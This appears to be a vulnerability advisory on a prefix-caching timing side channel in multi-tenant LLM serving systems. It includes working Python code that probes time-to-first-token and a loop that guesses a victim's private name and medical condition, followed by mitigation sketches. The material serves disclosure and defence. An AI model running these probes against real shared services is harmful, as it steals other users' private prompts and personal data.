LMVD-ID: 437934e8
Published March 1, 2026

LLM Prefix Cache Reconstruction

Affected Models: Llama 2 13B, Llama 4 7B, LLaVA 5B

Research Paper

CacheSolidarity: Preventing Prefix Caching Side Channels in Multi-tenant LLM Serving Systems

View Paper

Description: Automatic Prefix Caching (APC) in multi-tenant LLM serving systems introduces a timing side channel that permits cross-tenant data leakage. APC shares computed Key-Value (KV) tensors across different users whenever their requests begin with identical tokens. Because reusing cached tensors is significantly faster than recomputing them, cache hits and misses produce a measurable difference in Time-To-First-Token (TTFT). An attacker can exploit the shared cache by sending crafted requests (probes) and observing the TTFT: lower latency indicates a cache hit, confirming that the attacker's input matches a sequence in another user's prompt. This enables word-by-word prompt stealing and secret reconstruction. The side channel is most exploitable under low system load (low requests per second), with longer shared prefixes, and on larger model architectures, where recomputation costs are higher.
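The probing primitive the attack relies on is simply measuring how long a streaming request takes to return its first token. Below is a minimal sketch of such a probe, assuming an OpenAI-compatible completions endpoint; the URL, model name, and request fields are illustrative placeholders rather than values from the paper.

```python
import time
import requests

SERVER = "http://localhost:8000/v1/completions"  # hypothetical vLLM-style endpoint
MODEL = "meta-llama/Llama-2-13b-hf"              # illustrative model name

def measure_ttft(prompt: str) -> float:
    """Send a streaming completion request and return the time-to-first-token."""
    start = time.perf_counter()
    with requests.post(
        SERVER,
        json={"model": MODEL, "prompt": prompt, "max_tokens": 1, "stream": True},
        stream=True,
        timeout=30,
    ) as resp:
        resp.raise_for_status()
        # The first streamed chunk arrives once prefill finishes, so its delay
        # approximates TTFT; a cached prefix shortens prefill and hence TTFT.
        for _ in resp.iter_lines():
            return time.perf_counter() - start
    return float("inf")
```

A probe whose prefix is already cached returns its first token noticeably sooner than one that forces a full prefill, and that gap is the entire signal the attack needs.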

Examples: An attacker targets a victim who uses a known prompt template containing sensitive data.

  1. The victim submits the prompt: Compose a meeting agenda for an interdisciplinary team discussing the treatment plan for [Alice] with [Diabetes].
  2. The attacker uses an LLM-based Prompt Constructor to generate candidate prompts, substituting guesses for the unknown fields (e.g., ...treatment plan for [Bob] with [Cancer], ...treatment plan for [Alice] with [Diabetes]).
  3. The attacker submits these candidates to the shared serving system and measures the TTFT for each (see the probing sketch after these steps).
  4. Requests that miss the cache have a high TTFT. When the attacker submits the correct guess ([Alice] and [Diabetes]), the request hits the shared prefix cache populated by the victim.
  5. The attacker observes a sudden, distinct drop in TTFT, definitively confirming the victim's private information.
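A minimal version of steps 2 through 4, built on the hypothetical measure_ttft helper sketched above, might look like the following; the candidate lists, template string, and hit threshold are illustrative assumptions rather than values from the paper.

```python
TEMPLATE = ("Compose a meeting agenda for an interdisciplinary team "
            "discussing the treatment plan for [{name}] with [{condition}].")

names = ["Bob", "Alice", "Carol"]             # guesses for the unknown fields
conditions = ["Cancer", "Diabetes", "Asthma"]

# Establish a cache-miss baseline with a prompt no other tenant is likely to send.
baseline = measure_ttft("zq7-unique-baseline-prompt-not-shared-with-anyone")

for name in names:
    for condition in conditions:
        probe = TEMPLATE.format(name=name, condition=condition)
        ttft = measure_ttft(probe)
        # A TTFT well below the miss baseline suggests the probe hit a prefix
        # cached from another tenant's request, i.e. the guess is correct.
        if ttft < 0.5 * baseline:             # illustrative threshold
            print(f"Likely cache hit: {name} / {condition} (TTFT {ttft:.3f}s)")
```

In practice the attacker's own probes also populate the cache, so a real attack must pace and vary its probes (or wait for eviction) to avoid hitting its own entries; the sketch omits that bookkeeping.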

Impact: Cross-tenant information disclosure. Attackers can incrementally reconstruct sensitive prompts, extract proprietary instructions, and steal private user data (e.g., PII, medical conditions, financial secrets) from other tenants without requiring direct memory access or specialized privileges.

Affected Systems: Multi-tenant LLM serving frameworks and APIs that implement cross-user Automatic Prefix Caching (APC) or shared KV-caching. Specific systems highlighted include:

  • vLLM (when APC is enabled)
  • SGLang
  • Commercial LLM APIs implementing shared prefix caching across trust boundaries (e.g., OpenAI, DeepSeek, Google Gemini, MoonShot Kimi).

Mitigation Steps:

  • Selective Prefix Isolation (e.g., CacheSolidarity): Augment the KV cache with metadata (OwnerID and AttackFlag) to track prompt-user interactions. Allow initial cache sharing, but isolate continuation paths when a prefix is requested by multiple distinct users, forcing recomputation for non-owners (a simplified sketch follows this list).
  • User-Level Cache Isolation: Partition the KV cache per user or tenant to disable cross-user prefix sharing entirely. (Note: this mitigates the vulnerability but reduces inference performance).
  • Increase Cache Block Size: Increase the number of tokens grouped per cache entry. This does not close the channel but severely degrades the attack by forcing the adversary to correctly guess multiple tokens simultaneously rather than brute-forcing one word at a time.
  • Semantic Cache Isolation (e.g., SafeKV): Deploy an LLM-aided semantic analysis pipeline to identify requests containing sensitive information and selectively isolate only those prompts from the shared cache.
  • Timing Obfuscation: Inject random noise or pad prefill execution times so that the latency distributions of cache hits and misses become statistically indistinguishable to attackers (see the padding sketch after this list).
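To make the selective-isolation idea concrete, here is a heavily simplified, toy sketch of an owner-aware prefix cache. The class and field names are hypothetical and this is not the paper's CacheSolidarity implementation: the real mechanism permits some initial sharing and isolates continuation paths, whereas this sketch simply forces recomputation as soon as a second tenant touches a block.

```python
from dataclasses import dataclass, field
from typing import Optional

@dataclass
class PrefixBlock:
    kv_tensors: object    # stand-in for the cached KV tensors of one block
    owner_id: str         # tenant that first populated this block
    shared: bool = False  # set once a second, distinct tenant requests it

@dataclass
class OwnerAwarePrefixCache:
    """Toy cache that stops serving a block across tenant boundaries."""
    blocks: dict = field(default_factory=dict)

    def lookup(self, tenant_id: str, prefix_hash: str) -> Optional[object]:
        block = self.blocks.get(prefix_hash)
        if block is None:
            return None               # genuine miss: caller recomputes
        if tenant_id != block.owner_id:
            # Another tenant is probing this prefix: flag it and force the
            # non-owner to recompute, so its TTFT looks like a cache miss.
            block.shared = True
            return None
        return block.kv_tensors

    def insert(self, tenant_id: str, prefix_hash: str, kv_tensors: object) -> None:
        self.blocks.setdefault(prefix_hash, PrefixBlock(kv_tensors, tenant_id))
```

The point is that a probe from a different tenant behaves like a miss, so its TTFT no longer reveals whether the victim's prefix is resident in the cache.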

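For the timing-obfuscation mitigation, one crude server-side approach is to round every prefill up to the next multiple of a fixed padding quantum so that hit and miss latencies collapse onto the same grid. The quantum and function names below are illustrative; a production system would tune or randomize the padding and apply it inside the serving engine rather than as a wrapper.

```python
import math
import time

QUANTUM_S = 0.25  # illustrative padding quantum, tuned per deployment

def padded_prefill(run_prefill, *args, **kwargs):
    """Run the real prefill, then sleep until the next multiple of QUANTUM_S."""
    start = time.perf_counter()
    result = run_prefill(*args, **kwargs)
    elapsed = time.perf_counter() - start
    # Rounding every prefill up to the same grid collapses the gap between
    # cache hits and misses, at the cost of extra latency for fast requests.
    target = math.ceil(elapsed / QUANTUM_S) * QUANTUM_S
    time.sleep(max(0.0, target - elapsed))
    return result
```

This trades latency for indistinguishability: padding too coarsely hurts every request, while padding too finely leaves the hit/miss gap measurable.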
© 2026 Promptfoo. All rights reserved.